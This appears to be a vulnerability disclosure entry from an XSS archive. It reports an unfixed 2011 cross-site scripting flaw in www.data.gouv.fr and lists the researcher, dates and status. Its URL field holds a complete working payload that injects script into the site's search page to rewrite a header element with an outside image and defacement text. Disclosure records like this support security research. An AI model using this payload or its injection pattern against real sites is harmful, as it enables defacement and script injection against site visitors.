Security researcher yesnoornext, has submitted on 05/12/2011 a cross-site-scripting (XSS) vulnerability affecting www.data.gouv.fr, which at the time of submission ranked 3836238 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 05/12/2011 |
Date published: 05/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: yesnoornext |
Domain: www.data.gouv.fr |
Category: XSS |
Pagerank: 3836238 |
URL: http://www.data.gouv.fr/content/search?Type=data%3C/script%3E%3Cscript%3Edocument.getElementById%28% 22headerppal%22%29.innerHTML=%27%3Cimg%20src=%22http://www.attendconference.com/blog/wp-content/uplo ads/2011/04/cia.jpg%22%20/%3E%3Cp%3EAll%20your%20data%20gov%20are%20belong%20to%20you%3C/p%3E%27;%3C /script%3E%3Cscript%3E |
Click here to view the mirror
|
|
|